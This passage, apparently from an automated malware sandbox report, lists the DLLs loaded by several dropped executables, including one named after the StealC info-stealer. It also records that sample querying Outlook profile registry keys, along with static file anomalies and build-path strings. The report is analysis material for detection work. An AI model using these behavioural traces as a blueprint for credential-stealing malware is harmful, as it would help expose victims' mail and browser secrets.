                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: mozglue.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: vcruntime140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: msvcp140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: webio.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: schannel.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: msasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: gpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: napinsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: wshbth.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: nlaapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: winrnr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: windowscodecs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: napinsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: wshbth.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: nlaapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: winrnr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: vcruntime140.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: libffi-7.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: libcrypto-1_1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: libssl-1_1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: sqlite3.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: rstrtmgr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: ncrypt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: ntasn1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: mstask.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: dui70.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: duser.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: chartv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: oleacc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: atlthunk.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: winsta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: windows.fileexplorer.common.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: explorerframe.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                  Source: ebjtOH70jl.exeStatic file information: File size 3267072 > 1048576
                                  Source: ebjtOH70jl.exeStatic PE information: Raw size of lwujlavl is bigger than: 0x100000 < 0x2b1c00
                                  Source: Binary string: mozglue.pdbP source: stealc_valenciga.exe, 0000000B.00000002.2616003523.000000006C01D000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: nss3.pdb@ source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: client_jackbastadguy.exe, 00000017.00000002.2813747464.00007FFE01752000.00000002.00000001.01000000.0000003D.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client_jackbastadguy.exe, 00000017.00000002.2816737184.00007FFE02CE5000.00000002.00000001.01000000.00000023.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB56F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800440809.000002103CE50000.00000002.00000001.01000000.00000018.sdmp
                                  Source: Binary string: mozglue.pdb source: stealc_valenciga.exe, 0000000B.00000002.2616003523.000000006C01D000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: client_jackbastadguy.exe, 00000017.00000002.2826550918.00007FFE11BF0000.00000002.00000001.01000000.00000019.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: client_jackbastadguy.exe, 00000017.00000002.2817198633.00007FFE0C0BC000.00000002.00000001.01000000.0000003C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: client_jackbastadguy.exe, 00000017.00000002.2811502404.00007FFDFB9A3000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client_jackbastadguy.exe, 00000017.00000002.2810199165.00007FFDFB56F000.00000002.00000001.01000000.00000021.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826137537.00007FFE115FC000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826137537.00007FFE115FC000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2828840841.00007FFE13303000.00000002.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2814383023.00007FFE02C5C000.00000002.00000001.01000000.0000003B.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client_jackbastadguy.exe, 00000017.00000002.2816737184.00007FFE02CE5000.00000002.00000001.01000000.00000023.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2825920370.00007FFE11518000.00000002.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: client_jackbastadguy.exe, 00000017.00000002.2825303951.00007FFE1024D000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: nss3.pdb source: stealc_valenciga.exe, 0000000B.00000002.2616271280.000000006C1DF000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client_jackbastadguy.exe, 00000016.00000003.2709953421.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826756351.00007FFE11EB1000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826359531.00007FFE11BCD000.00000002.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2826946148.00007FFE12E16000.00000002.00000001.01000000.00000020.sdmp
